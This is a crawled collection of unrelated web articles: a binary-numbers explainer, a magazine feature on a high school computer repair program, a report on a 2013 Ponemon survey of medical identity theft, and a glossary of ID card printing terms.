Seven is the highest we can count to with only 3 bits. The formula for determining the highest value is to take 2^x -1, where x is the number of bits you have. In this case: 2^3 = 8. 8 -1 = 7.
Just like the base 10 number 453 is equal to 4*100 + 5*10 + 3*1, the same carries over to the binary system. In the binary number 7 above, it’s 1*4 + 1*2+ 1*1.
The value of the right-most bit, also known as the Least Significant Bit, is 2^0 multiplied by the one or zero that is there. 2^0 = 1, so:
The next bit to the left has the value of 2^1 or 2, so:
The third bit, in this case the Most Significant Bit, is 2^2 or 4, so:
2^2*0 = 0
2^2*1 = 4
So, the last example (7) is 4 + 2 + 1 = 7. The pattern continues so with 4 bits, the most significant bit would be equal to 2^3 or 8, and so on.
Here’s the value zero in decimal: 0 In binary: 00
In pop cans:
and here’s the value two in decimal: 2 In binary: 10
In pop cans:
Here’s a quick tip: If the Least Significant Bit (remember, the one all the way to the right) is a zero, the number is even. If the LSB is a 1, your number will be odd.
This continues on up to how many ever bits you have, from four bits…
on up to 11 bits and beyond.
Perhaps you’ve heard of 32-bit and 64-bit operating systems and now understand how a 64-bit OS has greater addressability over a 32-bit OS.
Decimal, Binary, and Beyond?
Decimal gives you a choice of 10 different numbers that can fill a place and binary gives you a choice of two. What if we introduced a third number to binary to make it trinary. A number’s place could either be zero, one, or two. (Perhaps we could use a Coke II for that role.) In that case, the same pattern would emerge:
To convert to decimal, the values would be:
3^0 * x =
3^1 * x =
3^2 * x =
and so on.
What if we made a number system that had more than ten possible digits? Well, there’s already a common one around called hexadecimal that uses 16 characters. In hexadecimal, there are 16 options for a space. It can either be: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, or F. You may recognize this as something you’ve seen before. Different computer codes use hexadecimal regularly like a network card’s MAC address or HTML color codes.
To convert to decimal, the values for hexadecimal would be:
16^0 * x=
16^1 * x=
and so on.
A hexadecimal digit can also be thought of a four bit binary digit. For example, this 1010 in binary would equal A (or 10 in decimal):
Ahh… It’s good to be done with that post. After reading through it, review the post to see if you understand the way binary numbers are counted or added together. There are plenty of great resources on the web or YouTube if you would like to continue learning.
That’s just the basics of binary and I hope I kept it accurate. Writing it up took a while but finally completed a thought I had at least two years ago. And as a reward for you, you should now understand the punchline of this joke:
“There are only 10 kinds of people in the world. Those who understand binary and those who don’t.” | <urn:uuid:daa38d2e-3579-4f65-a4b4-4b9b0700c042> | CC-MAIN-2017-04 | https://www.404techsupport.com/2011/01/pop-or-soda-pepsi-or-coke-binary-numbers-explained/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00070-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.907907 | 1,199 | 3.53125 | 4 |
Indiana high school kids learn IT skills by fixing and servicing computers
This feature first appeared in the Spring 2016 issue of Certification Magazine. Click here to get your own print or digital copy.
The Greek historian Plutarch wrote, “The mind is not a vessel that needs filling, but wood that needs igniting.” The inference is that lighting wood on fire will begin to provide light and knowledge to young minds. If this is true, then Brock Maust has a full-blown four-alarm blaze raging at Goshen High School (GHS) in Goshen, Ind.
The blaze is the school’s Computer Peer Repair Program. The program, supervised by Maust and run completely by students, is responsible for maintaining 2,500 laptop computers. As an added bonus, the program has now reached the stage of being self-funded and is preparing students to earn IT certifications.
In 2011, the Goshen Community Schools District recognized the importance and advantages of utilizing technology for learning and work, and set a goal of making their entire student body computer literate.
The District decided to phase in a one-to-one program of computers and students. They would begin by purchasing laptops for the incoming freshman class, then each new freshman class to follow would receive its own machines. By the fourth year, all students would have laptops on which to do their homework and class assignments.
Maust was busy teaching engineering and business classes — and also coaching both the boys and girls track teams — when his principal and the district superintendent approached him about organizing and managing the program.
The energetic teacher and coach, however, thrives on and enjoys challenges. His philosophy, he said, is “to not put a lid on my cup — I’m always looking for opportunities to grow and do new things.”
Maust believes he was chosen to run the program because of his engineering background, and also because “the program was not built yet. The plan was simple: ‘Have every student learn to use a laptop to enhance their educational experience.’ I have a degree in engineering technology, so I was able to grasp the Input-Process-Storage-Output and Feedback for the vision.”
Learning on the fly
After agreeing to run the program, Maust asked for clarification on what form it should take and exactly how it would work. The administration’s response was that they would support his efforts. Their only piece of advice was, “Just don’t let the building burn down.”
“The principal and superintendent had complete faith in us,” said Maust. “They knew we needed change, and that technology was growing at an exponential rate. There was no book we could turn to. We definitely learned to fly the plane as it was being built.”
District officials understood that Maust would have to build his program from the ground up and permitted him to hand-pick nine students to help him out. He selected students from his classes who he knew had a basic knowledge of computers and, more importantly, could work with and for him as needed.
Feeling that his students needed a more qualified teacher, and realizing that he didn’t have the knowledge base, Maust spent $1,000 of his own money to take a course that would help him better teach computer repair. “My wife wasn’t too pleased when she saw the bill,” he said laughingly.
The original vision for the program was for Maust to teach a computer repair class and supervise his nine students in simple troubleshooting for 500 laptops, as well as the boxing up of any machines that needed to be sent to the manufacturer for repair. As with a lot of fires, things quickly escalated. With the challenge of managing so many laptops it soon became obvious to Maust that his students could help conduct basic repairs.
He also realized that if the program were to become an authorized on-site repair location for the computer manufacturers, then it could be one-hundred percent self-funding. He met with administration, showed them the financial advantages, and laid out a curriculum to prepare students to earn the required IT certifications. District officials liked the idea and told him to keep going.
Full speed ahead
As with any new endeavor, this one brought many unforeseen challenges. “There were basic needs like shelving for 500 laptops, and scanners to help us check that many laptops in and out in a short period of time,” Maust said.
His team also had to develop a process of tracking when laptops needed to be repaired (yellow tape), when they were waiting for parts (red tape), and when they were good to go again (green tape). Each obstacle or problem was flagged — and then solved — as it arose. “Once we started to identify trends, then we began to create a vision and prepare for the problems before they happened,” Maust said.
The second year of the program meant an additional 500 laptops, and even more repairs. As more students enrolled in Maust’s classes, faculty began to see the positive impact of computers in the classroom. English, math and music teachers praised the ability of students to take notes, practice drills and use videos to learn new concepts.
By the end of the second year the district hired three of Maust’s students to help the program prepare for the coming school year. Under supervision, the students spent the summer repairing laptops and pulling computer cables throughout the building.
The program has been off and running ever since. For the current school year, the program is responsible for maintaining and servicing 2,500 laptops. The group also recently became certified to repair HP and Dell devices, and their work is now completely self-funded.
“As an on-site repair center, the program generates income that allows us to purchase more tools, equipment and storage capacity,” said Maust. “We are able to pay back the district for all of the equipment they supplied us, with and still make enough to help the district.”
Turning problems into assets
When dealing with so many laptops and teenagers, of course, there are the typical tech-related challenges — instances of unauthorized or inappropriate downloads, damaged or lost laptops, and so forth.
Maust has a very effective way of dealing with these issues. He focuses not on the technology, but on the student. “There will always be someone who wants to hack — a cow that gets out of the pasture,” he said. “We quickly identify the student and figure out why they did it, and then we focus on helping them learn and understand why they can’t do certain things.”
This focus on the student has been effective. “When a student does something wrong you have to implement discipline, but we do more than that,” said Maust. “If a student somehow gets ahold of administrative rights to the system, I’ll invite him to attend my class and teach him how to turn his skills around and make some money.”
Many of Goshen High’s students come from family backgrounds that lack portable computing devices at home, and they need to learn how to utilize them in an appropriate manner.
For some students, the program can be life changing. Jorge Reyes is a senior who credits the program for turning his educational experience around. During his freshmen year he was written up 19 times for disciplinary infractions.
During his sophomore year Reyes started taking the computer courses — and had just three disciplinary write-ups. “When he came on board with us, we saw a passion,” said Maust. “During his junior year, Reyes had zero disciplinary issues and became the program’s first ‘on-site’ computer repair manager. He has the responsibility to organize, order and manage all ‘on-site’ repairs.”
“I was on a bad path up until I found the computer repair program and was able to apply myself to something I grew to really enjoy,” said Reyes. “I am forever grateful to Mr. Maust. You can always turn things around and change your future!”
In addition to teaching students to work with computers, Maust’s program includes a hefty dose of the real-world skills they will need as they enter the workforce. Dealing with others when troubleshooting laptops, for example, the students have to develop interpersonal skills.
According to Maust, students “enhance their knowledge of current technology, ethical judgment and decision making, oral communication, data/statistics, organization, critical/analytical thinking and their ability to work with others through the onsite repair program.”
This year, Maust has more than 120 students enrolled in his computer courses, which they can take as a requirement or an elective, and many are earning IT certifications. His goal is for students to earn several certifications during their four years at school.
The program utilizes TestOut courseware to prepare students for TestOut’s PC Pro, Network Pro, and Security Pro courseware, as well as CompTIA’s A+, Network+, and Security+. These certifications are useful for students who want to work in computer repair, tech support, and IT infrastructure and security. Since the program is self-funding, it also pays for the cost of the certification exams.
The District has ambitious plans to expand the program. In the 2016- 2017 school year, it is proposed that the program will troubleshoot and maintain more than 6,000 devices district-wide. They will also open an on-site repair facility at the middle-school level. That particular project has been under the direction of Goshen’s technology associate Ron Lambdin — with the assistance of Jorge Reyes.
Maust is very appreciative of Reyes’ role in the middle-school expansion, “He has become the most vital part of our future vision by becoming our very first ‘off-site’ computer repair manager. An amazing adventure for this young man!” Reyes recently joined the district’s middle-school staff as an intern to help build the foundation for their on-site repair program.
The latest proposal is that, during the 2017-2018 school, year the district will create a community-wide co-op so that other districts can have students who are interested in IT certifications and tech support take courses at Goshen High.
The purpose will be to help those students earn IT certifications and return to their own schools where, with the assistance of Goshen’s ‘offsite’ managers, they can establish on-site repair facilities. “This is the reason I get up in the morning, this is my passion” said Maust. “This will allow other school districts in our community to enhance, flourish and grow like we have. They can learn from our struggles and our journey.” | <urn:uuid:0d2701cd-9185-4210-b7f2-f2bedcf57ad5> | CC-MAIN-2017-04 | http://certmag.com/indiana-high-school-kids-learn-skills-fixing-servicing-computers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00099-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.978608 | 2,280 | 3.015625 | 3 |
Medical identity theft is a national healthcare issue with life-threatening and hefty financial consequences. According to the 2013 Survey on Medical Identity Theft conducted by Ponemon Institute, medical identity theft and “family fraud” are on the rise; with the number of victims affected by medical identity theft up nearly 20 percent within the last year.
For the purposes of this study, medical identity theft occurs when someone uses an individual’s name and personal identity to fraudulently receive medical services, goods, and/or prescription drugs, including attempts to commit fraudulent billing.
Half of the consumers surveyed are not aware that medical identity theft can create life-threatening inaccuracies in their medical records, resulting in a misdiagnosis, mistreatment, or the wrong prescriptions. Yet, 50 percent of consumers surveyed do not take steps to protect themselves, mostly because they don’t know how.
The survey also finds that consumers often put themselves at risk by sharing their medical identification with family members or friends—unintentionally committing “family fraud”—to obtain medical services or treatment, healthcare products, or pharmaceuticals.
“Medical identity theft is tainting the healthcare ecosystem, much like poisoning the town’s water supply. Everyone will be affected,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. “The survey finds that consumers are completely unaware of the seriousness and dangers of medical identity theft.”
Key findings of the 2013 report:
Medical identity theft is growing in volume, impact, and cost.
Medical identity theft and fraud are major societal problems, placing enormous pressure on the country’s healthcare and financial ecosystems. In 2013, the economic consequences of medical identity theft to victims are estimated at more than $12.3 billion in out-of-pocket expenses. Fifty-six percent of victims lost trust and confidence in their healthcare provider. Fifty-seven percent of consumers would find another provider if they knew their healthcare provider could not safeguard their medical records.
Medical identity theft can cause serious medical and financial consequences, yet most consumers are unaware of the dangers.
Half of the consumers surveyed are not aware that medical identity theft can create permanent, life-threatening inaccuracies and permanent damage to their medical records. Medical identity theft victims surveyed experienced a misdiagnosis (15 percent of respondents), mistreatment (13 percent of respondents), delay in treatment (14 percent of respondents), or were prescribed the wrong pharmaceuticals (11 percent of respondents). Half of respondents have done nothing to resolve the incident.
Most consumers don’t take action to protect their health information.
Fifty percent of respondents do not take any steps to protect themselves from future medical identity theft. Fifty-four percent of consumers do not check their health records because they don’t know how and they trust their healthcare provider to be accurate. Likewise, 54 percent of respondents do not check their Explanation of Benefits (EOBs). Of those who found unfamiliar claims, 52 percent did not report them.
Consumers often share their medical identification with family members or friends, putting themselves at risk.
Thirty percent of respondents knowingly permitted a family member to use their personal identification to obtain medical services including treatment, healthcare products or pharmaceuticals. By sharing medical identification with family members or friends, consumers unintentionally leave themselves and their health records vulnerable. People do not know that they are committing fraud. More than 20 percent of people surveyed can’t remember how many times they shared their healthcare credentials. Forty-eight percent said they knew the thief and didn’t want to report him or her. | <urn:uuid:c8d3ec4f-00be-45ee-88dc-94bf09637b72> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2013/09/13/medical-identity-theft-affects-184-million-us-victims/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00429-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951796 | 735 | 2.59375 | 3 |
Jump to: D-F | G-I | J-L | M-O | P-R | S-U | V-Z
Access Control – A system used to control access to buildings or rooms within buildings. Plastic cards (e.g., those with magnetic stripe or proximity control technologies) can be used to gain access to premises.
Barcode – A code consisting of a group of printed and variously patterned bars and spaces, and at times numerals, designed to be scanned and read into computer memory as identification for the object it labels.
Biometrics – Utilizes "something you are" to authenticate identification. This might include fingerprints, retina patterns, irises, hand geometry, vein patterns, voice passwords, or signature dynamics. Biometrics can be used with a smart card to authenticate the user. A user's biometric information is stored on a smart card, the card is placed in a reader, and a biometric scanner reads the information to match it against that on the card. This is a fast, accurate, and highly secure form of user authentication.
Bluetooth – A short range radio technology aimed at simplifying communications among Internet devices and between devices and the Internet. Another of its goals is to simplify data synchronization between Internet devices and other computers.
CR79 Card – Slightly smaller dimensionally than CR80, and made to fit in the well of a proximity card. Dimensions are 3.303" x 2.051" (83.9 mm x 51 mm).
CR80 Card (Standard credit card size) – Dimensions are 3.375" x 2.125" (85.6 mm x 54 mm).
CR90 Card (Driver's license size) – Dimensions are 3.63" x 2.37" (92 mm x 60 mm).
CR100 Card (Oversize/military cards) – Dimensions are 3.88" x 2.63" (98.5 mm x 67 mm).
CSV (Comma separated values) – A file format in which data values are separated by commas. An ID card software that offers import capability of CSV data allows you to access records from stored CSV text files.
CAC Card (Common access card) – Is a smart card distributed by the US Department of Defense (DoD) as a standard identification for active-duty military personnel, reserve personnel, non-DoD government employees and state employees of the National Guard and eligible contractor personnel. CAC cards are used as a common identification card as well as for authentication to grant access to DoD computers, networks and facilities. CAC establishes an authoritative process for the use of identity credentials.
CardJet Card – A Fargo Electronics, Teslin-based CR80 card with a surface that is specially formulated for thermal inkjet printing. CardJet inks bond to cards and dry instantly, without smearing. CardJet cards stand up well to abrasion, dye-migration and UV fading.
CardJet Printing – A discontinued printing technology by Fargo Persona that uses an HP inkjet-based print engine to transfer color and monochrome inks onto specially formulated CardJet cards. This particular inkjet printing process involves heating the inks within an ink cartridge. The heat generates vapor bubbles that are ejected in tiny droplets through nozzles in the ink cartridge. The droplets form text and images on the printable card surface which then bond and dry instantly. Example printers are the discontinued CardJet 410 and CardJet C7.
Card Dispenser – A container used to store blank cards in order to keep them free from dust and debris.
Chip – A piece of semi-conducting material (usually composed of silicon) on which an integrated circuit is embedded. Fitted inside an ID card that is used to store user information and access privileges, chips also provide added security to prevent card counterfeiting.
Card Hopper – A card hopper is a device that holds cards either prior to being printed (input hopper) or catches the card after it has been printed (output hopper). They also to keep cards clean and contaminate-free.
Cleaning Card – Assists in keeping a printer clean and maintaining the crucial components of the printer including the printhead, transport rollers and magnetic encoding station. Many card printer manufacturers recommend cleaning the printer with a cleaning card each time the ribbon is replaced.
Cleaning Roller – Includes an adhesive surface to gather dust and debris from blank cards. Many card printer manufacturers recommend replacing the cleaning roller after every 1000 prints or sooner.
Cleaning Tape – A roll of adhesive-lined material used to pick up dust and debris from blank cards prior to printing.
Combination Card (Combi Card) – Contains both contact and contactless chip technologies, using two different chips. Learn more about technology cards.
Composite Card (Comp or Polyester Composite Card) – A polyester core sandwiched between PVC material. Stronger and more durable than regular PVC cards, comp cards are recommended for utilization in high-usage environments or if lamination is part of one's particular ID card printing process. (Composition is 40% polyester/PET and 60% PVC material.)
Contact Smart Card – Contains a single embedded circuit chip that contains memory, or memory plus a microprocessor. Contact smart cards must be inserted into a card acceptor device where pins attached to the reader make "contact" with pads on the surface of the card to read and store information on the chip. Learn more about technology cards.
Contactless Smart Card (Proximity Card/Prox Card) – Contains a chip that is connected to an antenna (rather than contact pads as in contact smart cards). The communication between the chip and the reader is therefore wireless. Learn more about technology cards.
Cut and Paste – Refers to the very manual and outdated process of creating ID cards. This process involves taking a photo, manually cropping it and sticking it onto a card and then laminating it with a thermal laminator.
Florescent Panel – The F panel of a dye-sub printer ribbon allows you to print fluorescent grayscale text or images that are only visible with ultraviolet (UV) light. Using the F panel of a ribbon allows you to economically add a covert security feature to your printed ID cards.
GSA (General Services Administration) – A United States government organization that establishes pre-negotiated pricing for a variety of business-related equipment, products, and services for purchase by federal agencies. ID Wholesaler is GSA listed and stocks a comprehensive line of GSA-approved photo ID card printers, printer supplies, and ID badge accessories.
Guilloche Pattern (Fine Line Design) – A visual security element on a card that consists of a complex pattern of curving and overlapping fine lines. Guilloche patterns produce an illusion of motion when viewed at certain angles and therefore can be verified by the naked eye but not reproduced via a desktop printer.
Half Panel YMCKO Ribbon – Consists of half of the normal size yellow (Y), magenta (M) and cyan (C) color panels, but full panels of the black/monochrome (K) and clear overlay (O). This ribbon allows twice the normal ribbon yield than the standard YMKCO ribbon at a lower cost per card. YMCKO half panel ribbon is suited for cards where a color ID picture is needed, along with some background black resin text, logo or barcode printing. Examples of what this ribbon can be used for include student ID cards, employee ID cards and driver's licenses.
High Coercivity (HiCo) – Magnetic coding on a magnetic stripe. HiCo stripes are encoded at 2750 Oersted. HiCo magnetic stripes are generally black and store information on a more secure basis than low coercivity magnetic stripes due to the higher level of magnetic energy required to encode them. Information is harder to erase on HiCo cards; therefore, they are common in applications where cards are swiped often and require a long life (e.g., credit card applications).
High Volume Printing - Fast, efficient printing for producing large quantities of cards with minimal down time for supplies loading or maintenance.
High Definition Printing (HDP) – A process involving the printing of full color images onto clear HDP transfer film. The HDP film is then fused to the card through heat and pressure via a heated roller. This technology enhances card durability and consistently produces the best card color available - even on tough-to-print matte-finished cards, proximity cards and smart cards.
Hologram – A unique photographic printing that provides a three dimensional (3D) effect on a flat surface. Holograms cannot be easily copied and are used for visual security and aesthetic purposes on cards. Holographs are usually applied to ID cards as laminates, but they can also be built into blank card stock.
HoloKote – A Magicard patented card watermark technology; Magicard printers print a HoloKote watermark into the card overlay layer during printing. View a sample card with HoloKote and HoloPatch.
HoloMark – A tamper-evident, instantly verifiable 3-D image in a high resolution hologram embedded onto a card. Fargo standard and custom HoloMark cards provide an added level of protection against ID counterfeiting. HoloMark cards are for use with Fargo Direct-to-Card (DTC) series card printers/encoders. View a sample custom HoloMark card.
HoloMark Seal – A Fargo-brand peel-and-stick 3-D seal that if removed from a card, is not reusable. A checkerboard pattern will appear to indicate both the card and the seal have been tampered with. The HoloMark seal is a quick, economical way to add a level of security to an existing card.
HoloPatch – A unique Magicard visible gold patch built into blank card stock; HoloPatch works with HoloKote to highlight one of the HoloKote watermarks, providing daylight-visible ID card security. View a sample card with HoloKote and HoloPatch.
Hopper – Card input and output hoppers hold card stock as they are fed and ejected from the ID card printer.
HSPD 12 (Homeland Security Presidential Directive 12) – HSPD 12 established the requirements for a common identification standard for ID credentials issued by Federal departments and agencies to Federal employees and contractors for gaining physical access to Federally controlled facilities and logical access to Federally controlled information systems.
Inhibitor Panel Ribbons – Ribbons used for omitting printing over defined areas of a card, such as contact smart chips, a signature panel, or cards with embedded holograms.
Inkjet Printer – A printer or an all-in-one unit that shoots fast drying ink through tiny nozzles onto a page to form characters. The inkjet is currently the standard for personal computer printing. Inkjets are fast, affordable and relatively quiet, they provide high quality graphics and print in color.
Input Card Hopper – An ID card printer apparatus that holds cards before they are printed. Input hoppers expedite the printing process and help prevent card contamination, ensuring the very best possible print quality.
Interface - A connection standard for transferring data that's recognized by all PCs or Macintosh computers. For example, a parallel printer port is a common interface found on virtually all PCs for transferring data from the computer to a printer.
International Organization for Standardization (ISO) – In the ID card printing market for instance, ISO defines specifications for magnetic stripe encoding. Printer encoders generally support dual high/low coercivity and tracks 1, 2 and 3. Please check printer specifications.
Key FOB – A security token that can be attached to a keychain.
JIS II – Japanese Industrial Standard for magnetic stripe encoding. JIS II is published and translated into English by the Japan Standards Association.
Lamination (Overlamination) – The process of combining lamination material and core material using time, heat and pressure. Available in clear or holographic designs and in varying thicknesses, laminate patches are typically used for high usage cards (e.g., cards that must be swiped through a reader) or to add advanced visual card security.
Lanyard – A ribbon with a clip worn around the neck, usually used to display one's ID card.
Liquid Crystal Display (LCD) – Shows the current status of the printer, and changes according to the printer's current mode of operation. LCD communicates an error with text, which is easier to interpret than LED lights.
Light-Emitting Diode (LED) – Shows the current status of a printer, and changes according to the printer's current mode of operation. LED communicates with a blinking light.
Lockable Hopper – Some ID card printers provide a lockable card hopper door. This lock is intended to help prevent theft of your blank card stock. This feature is especially helpful if using valuable card stock such as preprinted cards, smart cards or cards with built-in security features such as holograms.
Low Coercivity (LoCo) – Magnetic coding on a magnetic stripe. LoCo stripes are encoded at 300 Oersted. LoCo stripes are generally brown and store information less securely than high coercivity magnetic stripes.
Machine Readable – A code or characters that can be read by machines.
Magnetic Stripe (Magstripe) – Refers to the black or brown stripe on the back side of a card. The stripe is made of magnetic particles of resin. There are two types of magnetic striping: high coercivity (HiCo) and low coercivity (LoCo). The resin particle material determines the coercivity of the stripe; the higher the coercivity, the harder it is to encode or erase information from the stripe. Magnetic stripes are often used in applications for access control, time and attendance, lunch programs, library cards and more. HiCo magnetic stripe cards are used in applications of frequent usage and need a long life (e.g., credit card applications); LoCo magnetic stripe cards are often used in hotel room access control applications.
Per the ISO 7811 format, the amount of data you can encode to a magnetic stripe is as follows:
Microprocessor Card (Asynchronous Card) – A type of smart card that features 1 kilobyte to 64 Kbytes of memory and is suitable for portable or confidential files, identification, tokens, electronic purses or any combination of uses.
Microtext – A visual security element on a card that is usually placed within a line or artwork element. Microtext is only a few thousandths of an inch tall, is visible only under magnification, and cannot be duplicated by dye sublimation, inkjet or laser printers.
Minimum Advertised Pricing (MAP) – The manufacturer's suggested retail price (MSRP) or an alternative factory-established price that some products are required to be advertised at.
Monochrome – A single color (does not pertain only to black).
Network ID Software – Software that allows the saving, storage and sharing of cardholder records and data across multiple facilities, departments and applications.
Network Printer – A printer available for use by workstations on a network.
ODBC (Open database connections) – ID card software with ODBC connectivity allows you to share card data between internal and outside databases.
Oersted – Pertains to magnetic encoding. The unit of magnetic coercive force used to define difficulty of erasure of magnetic material.
Output Card Hopper – Attaches to an ID card printer and ”catches” cards after they’ve been printed. Some printers offer the option of re-arranging the location of the output hopper to have the cards exit the printer on the same side that they enter (especially beneficial for offices having tight workspaces).
Output Stacker – Stores printed cards in a first-in/first-out order. This feature makes it easy to keep printed cards in a specific order for faster issuance or to print serialized cards.
Overcoat (Overlay, Topcoat) – The last layer ('O' in YMCKO) that is placed onto an ID card after the color or monochrome panels have been applied that protects an ID card from fading and scratching.
Oversized Cards – Used for more efficient visual identification and are available in many non-standard sizes. The most popular sizes are CR90 (3.63" x 2.37"/92 mm x 60 mm) and CR100 (3.88" x 2.63"/98.5 mm x 67 mm).
Overlamination (Lamination) - The process of combining lamination material and core material using time, heat and pressure. Available in clear or holographic designs and in varying thicknesses, laminate patches used in card printers come on rolls, with and without carriers/liners and are typically used for high usage cards (e.g., cards that must be swiped through a reader) or to add advanced visual card security.
Overlay (Overcoat, Topcoat) – The clear overlay panel (O) is provided on dye sublimation print ribbons. This panel is automatically applied to printed cards and helps prevent images from premature wear or UV fading. All dye sublimation printed images must have either this overlay panel or an overlaminate applied to protect them.
Over-the-Edge (Edge-to-Edge/Edgeless) – Refers to the maximum printable area on a card. Printers with this capability can print past the edge of a card resulting in printed cards with absolutely no border.
Parallel Interface – A channel or transmission path capable of transferring more than one bit simultaneously.
Polyester Composite Card (Poly-Comp or Comp Card) – A polyester core sandwiched between PVC material. Stronger and more durable than regular PVC cards, comp cards are recommended for utilization in high-usage environments or if lamination is part of one's particular ID card printing process. (Composition is 40% polyester and 60% PVC material.)
PET Card (Plain Polyethylene Terephthalate or Polyester Card) – Composite cards produced for use in the identification industry are made from PET-G, also known as glycolised polyester. The 'G' represents glycol modifiers, which are incorporated to minimize brittleness and premature aging that occur if unmodified amorphous polyethylene terephthalate (APET) is used in the production of cards.
PIV Card (Personal Identity Verification Cards) – A smart card issued to an individual for the purpose of identification verification. PIV cards contain stored identity credentials (e.g., photo, electronic fingerprint representation) so that the identity of the cardholder can be verified against stored credentials by another person or computer. PIC cards must be personalized with identity information for the individual to whom the card is issued, in order to perform identity verification by both humans and automated systems. Humans can use the physical card to conduct automated identity verification.
Printhead – Card printer component that applies the text, graphics and images to the card material.
Printer Driver – The software that enables your operating system to properly build and format commands and data bound for your printer; in effect, a printer driver tells your operating system all that it needs to know to successfully operate your printer.
Proximity Card (Prox Card/Contactless Smart Card) – Used for access control applications. Embedded in the card is a metallic antenna coil, which allows it to communicate with an external antenna. Because the cards require only close "proximity" to a RF antenna to be read, they are also referred to as contactless cards.
Proximity Card Encoder – The prox card encoder uses a HID ProxPoint Plus reader mounted on the e-card docking station inside the printer/encoder. The ProxPoint is a "read only" device producing a Wiegand signal that is converted to RS-232 using a Cypress Computer Systems CVT-2232. Application programs can read information from HID prox cards via a RS-232 signal through a dedicated DB-9 port on the outside of the printer labeled "Prox."
Polyvinyl Chloride (PVC Cards) – The primary material used for typical plastic cards.
Radio Frequency ID (RFID) – A wireless technology for communication between electronic devices. In the ID card industry, it is RFID technology that enables a contactless smart card to communicate with a reader.
Reject Hopper – A dedicated receptacle that collects the printed cards which fail to encode properly during the card printing process. A reject hopper may be integrated into the printer or may be attached to the printer.
Restrictions of the Use of Hazardous Substances (RoHS) – An advanced Japanese and European directive that regulates maximum concentrations of six hazardous materials that are used in electrical and electronics equipment. These materials are lead, mercury, cadmium, hexavalent chromium, polybrominated biphenyls (PBB) and polybrominated diphenyl ethers (PBDE).
Resin Thermal Transfer – The process used to print sharp black text and crisp barcodes that can be read by both infra-red and visible-light barcode scanners. It is also the process used to print ultra-fast, economical one color cards. Like dye sublimation, this process uses a thermal printhead to transfer color from the ribbon roll to the card. The difference is that solid dots of color are transferred in the form of a resin-based ink which fuses to the surface of the card when heated. This produces highly durable, single color images.
Resolution – Dimension of the smallest element of an image that can be printed. Usually stated as dots per inch (DPI).
Retransfer (reverse image transfer) – ID card printing technique where the card image is first printed onto transparent retransfer film that is then stuck onto the card surface. Retransfer printing provides high quality images and provides the ability to print on uneven card surfaces and/or differing materials.
Retransfer Film (reverse transfer film) – Used with a reverse transfer ID card printer which first transfers information to be printed onto the card to the underside of a clear ribbon (the initial dye transfer), then transfers the printed information from that ribbon onto the card so that the information on the card appears under a protective "release layer" of the clear ribbon (the retransfer step). In essence, card images are transferred (or sublimated) from the YMCK dye film onto a clear film and then laminated entirely onto the card.
Rewritable Card – Contains a thermo-sensitive material that allows data to become visible/invisible depending upon the temperature applied. Cards can be erased and rewritten many times over. Rewritable card applications include uses in visitor management, customer loyalty and schools.
Scratch Off Ribbon – Used for applications such as pre-paid phone cards. Scratch off ribbon to 'hides' the PIN number that will activate the phone card until it is in the hands of the card owner. Before applying scratch off ribbon, a monochrome or full color ribbon (scratch off ribbon can be applied on top of the overlay or 'O' panel of a YMCKO ribbon) must be used to print the data and graphics desired on the card. Then the monochrome or color ribbon must be replaced with the scratch off ribbon (the card layout must subsequently also be changed so that the scratch off material prints in the area desired) and the card resent through the printer.
Self-Adhesive Laminate – A laminate that can be applied manually - without the use of a thermal lamination unit. Laminates in general can add an extra level of security and durability to a card.
Signature Capture Pad – A form of biometrics that contains a touchpad sensor that reads the pressure applied to a stylus tip used for signing, and then transmits the data to a computer.
Signature Panel – An area on a card the allows the cardholder to write their personal signature.
Single-Sided – Capable of printing on only one side of a card.
Smart Card – Cards that have an embedded computer circuit that contains either a memory chip or a microprocessor chip. There are several types of smart cards, including: memory, contact, contactless, hybrid (twin), combi, dual interface and proximity. Learn more about technology cards.
Thermal Printhead – An electronic device which uses heat to transfer a digitized image from a special ribbon to the flat surface of a plastic card.
Thermal Printing – The process of creating an image on a plastic card using a heated printhead.
Thermal Transfer Overlaminate – A card overlaminate available in a 0.25 mil thickness that increases card security and durability; often used for moderate durability applications or when additional security (such as holographic images) is needed.
Topcoat (Overcoat, Overlay) – The topcoat (T) panel of a ribbon is applied to printed cards and helps prevent images from some premature wear or UV fading. Topcoats are available as a panel on color and monochrome ribbons, or provided on a separate roll in clear or holographic styles.
Twain – An interface used for communications between image processing software and digital cameras or scanners that allows for the importing of an image into the image processing software.
TWIC Card (Transportation Worker Identification Credential) – TWIC is a common identification credential for all personnel requiring unescorted access to secure areas of facilities and vessels by the Maritime Transportation Security Act (MTSA), and all mariners holding the Coast Guard-issued credentials. TWIC cards are a tamper-resistant credential containing the cardholder's biometric (fingerprint template) to allow for a positive link between the card and the individual.
Ultraviolet (UV) Ink – A visual security element on a card that allows invisible graphics to turn red when viewed under UV light.
Universal Serial Bus (USB) – An input/output (I/O) bus capable of data transfer at 12 megabits (1.5 megabytes) used for connecting peripherals to a microprocessor. Typically, each device connected to a computer uses its own port. USB can connect up to 127 peripherals through a single port by daisy-chaining the peripherals together. USB devices may be hot plugged, which means that power does not have to be turned off to connect or disconnect a peripheral. Most major hardware, software, and telecommunications providers support USB. Some printers do not yet support USB; however, most will accommodate a parallel to USB conversion cable.
Visitor Management Software – Software used to register, badge and track visitors.
VeriMark – A tamper-evident, instantly verifiable 2-D silver metallic foil embedded with a logo or other custom graphics onto a card using a hot stamp process. Fargo custom VeriMark cards provide an added level of protection against ID counterfeiting. VeriMark cards are for use with Fargo Direct-to-Card (DTC) series card printers/encoders. View a sample custom VeriMark card.
Wax Ribbon – Can be applied to an array of card materials and is therefore more versatile than a standard ribbon. Wax ribbon can be used with ABS and special varnished cards, as well as non-PVC card materials such as cardboards (e.g., paper cards).
Webcam – A digital camera capable of downloading images to a computer for transmission over the Internet or other network.
YMC (Yellow/Magenta/Cyan) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors.
